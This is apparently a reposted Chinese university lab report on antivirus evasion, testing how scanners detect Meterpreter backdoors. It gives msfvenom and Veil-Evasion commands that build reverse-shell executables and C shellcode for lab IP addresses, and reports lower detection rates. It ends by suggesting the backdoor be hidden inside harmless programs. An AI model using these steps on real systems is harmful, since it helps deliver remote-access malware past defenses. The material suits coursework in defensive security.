20145228《网络对抗技术》免杀原理与实践

本文介绍了免杀技术的基本原理及实践方法,包括使用msfvenom生成后门程序、利用Veil-Evasion规避检测及通过C语言调用Shellcode实现免杀。通过不同工具和技术的应用,展示了如何让恶意代码躲避杀毒软件的检测。

实验内容

•理解免杀技术原理

•正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

基础问题回答

(1)杀软是如何检测出恶意代码的?

1*恶意代码一般具有明显的特征码,依据特征码来判断是否是恶意代码

2*如果一个程序的行为是带有恶意的行为,也会被检测为恶意代码

(2)免杀是做什么?

免杀就是避免杀软的查杀与检测

(3)免杀的基本方法有哪些?

•改变特征码

•尽量避免杀软检测到带有恶意的行为,如使用反弹式连接

实验过程

实验过程中使用的是virscan来进行在线查毒,非常方便

msfvenom直接生成meterpreter可执行文件

·按照前一次实验的操作,用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.184.128 LPORT=5228 -f exe > 20145228.exe来生成一个后门程序

·然后利用ncat指令传送到主机

·最后检测结果:

887033-20170325122034361-1064896429.png

基本都可以发现这是个恶意代码

使用Veil-Evasion生成可执行文件

·Veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装

·直接输入veil-evasion打开

887033-20170325122047643-808046776.png

·然后依次键入以下指令:

use python/meterpreter/rev_tcp //设置payload

set LHOST 192.168.88.144 //设置反弹连接IP

set LPORT 5228 //设置反弹端口5228,默认为4444

generate //生成

145213 //程序名

887033-20170325122058033-1317040020.png

以结果图可知,该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里。

检测结果:

887033-20170325122105408-381656045.png

这次基本没几个能检测出来了

使用C语言调用Shellcode

•使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.3 LPORT=5228 -f c命令生成一个C语言shellcode数组

887033-20170325122114502-904144136.png

•然后将这段数组在VC上进行编写shellcode

•在Kali下使用msf监听,运行刚刚编译生成的可执行文件,成功获取权限。

887033-20170325122124049-1227009021.png

最后再去检测

887033-20170325122144424-645068072.png

附上我的杀软版本:

887033-20170325122153346-796385768.png

实验体会

清楚地了解了杀毒软件查杀的原理,如何使得自己的恶意代码免杀、恶意代码的伪装。一款杀软的检测并不能代表最后的结果

离实战还缺些什么技术或步骤

最重要的是后门的伪装,较好的方法是隐藏到一些非恶意程序里再进入目标主机

转载于:https://www.cnblogs.com/J000/p/6616779.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值